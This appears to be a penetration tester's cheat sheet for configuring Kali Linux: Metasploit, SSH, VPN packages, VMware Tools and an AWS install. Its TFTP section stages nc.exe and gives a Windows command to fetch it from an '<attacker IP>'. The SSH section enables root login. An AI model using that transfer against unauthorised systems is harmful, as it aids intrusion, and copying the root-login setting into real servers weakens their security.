Kali


# Terminal

Edit > Profile Preferences
Colors: Uncheck Use transparent background
------------------------------------------------------------------------------------------------------

# Disable screen lock

Top right icon > tools icon > Power
Power Saving > Blank screen: Never
Back arrow
Privacy > Screen Lock > Automatic Screen Lock: Off
------------------------------------------------------------------------------------------------------

# gedit

Preferences
View: Display line numbers, Highlight current line
Editor: Tab width 5, Insert spaces instead of tabs
Color Scheme: Oblivion
------------------------------------------------------------------------------------------------------

# Setup Metasploit

msfdb init          Initialize the database
msfconsole
db_status           Look for: postgresql connected to msf
------------------------------------------------------------------------------------------------------

# SSH
ssh-keygen                                       Create new keys

/etc/ssh/sshd_config                             Daemon config file
PermitRootLogin yes                              Change to yes
AuthorizedKeysFile                               Uncomment

service ssh start                                Start ssh
netstat -antp | grep ssh                         Verify the service is running
update-rc.d ssh enable                           Enable ssh to start at boot time
update-rc.d ssh disable                          Disable ssh from starting at boot time
------------------------------------------------------------------------------------------------------

# Install Discover scripts

git clone git://github.com/leebaird/discover.git /opt/discover/
cd /opt/discover/
./update.sh
------------------------------------------------------------------------------------------------------

# Install VMware Tools

VMware > Virtual Machine > Install VMware Tools > Install
cp /media/cdrom/VMwareTools-<version>.tar.gz /root/
cd /root/
tar zxvf VMwareTools-<version>.tar.gz 
cd vmware-tools-distrib/
./vmware-install.pl 
Accept all the defaults
reboot
------------------------------------------------------------------------------------------------------

# TFTP
mkdir /tftp                                      Create a new home folder for tftp
atftpd --daemon --port 69 /tftp                  Start tftp and assign home folder
netstat -anup | grep atftp                       Verify the service is running
cp /usr/share/windows-binaries/nc.exe /tftp/
tftp -i <attacker IP> get nc.exe                 Run from Windows
------------------------------------------------------------------------------------------------------

# VPN

apt-get install network-manager-iodine network-manager-iodine-gnome
apt-get install network-manager-openconnect network-manager-openconnect-gnome
apt-get install network-manager-openvpn network-manager-openvpn-gnome
apt-get install network-manager-pptp network-manager-pptp-gnome
apt-get install network-manager-strongswan
apt-get install network-manager-vpnc network-manager-vpnc-gnome
/etc/init.d/network-manager restart

# Thanks to Robert Clowser for the bug fix!
nano /etc/network/interfaces
Remove the last two lines egarding eth0. 
Reboot
------------------------------------------------------------------------------------------------------

# AWS

Instances > Launch Instance
AWS Marketplace > search for debian jesse > Select
t2.medium with 2 VCPUs and 4GB of RAM
Next: Configure Instance Details
Next: Add Storage > change size to 30GB
Review and Launch > Launch
Select a key pair

ssh -i <key.pem> admin@<targetIP>
sudo su
passwd
Set new root password
vim.tiny /etc/apt/sources.list
Add deb http://http.kali.org/kali kali-rolling main contrib non-free

apt-get update && apt-cache search kali-linux

[!] You will see the following error.
W: GPG error: http://http.kali.org kali-rolling InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY ED444FF07D8D0BF6

[*] Fix
gpg --keyserver pgpkeys.mit.edu --recv-key ED444FF07D8D0BF6
gpg -a --export ED444FF07D8D0BF6 | apt-key add -

apt-get install locate
apt-get install kali-linux-full

Accept all of the defaults

cd /opt/
git clone git://github.com/leebaird/discover.git
cd discover/
./update.sh
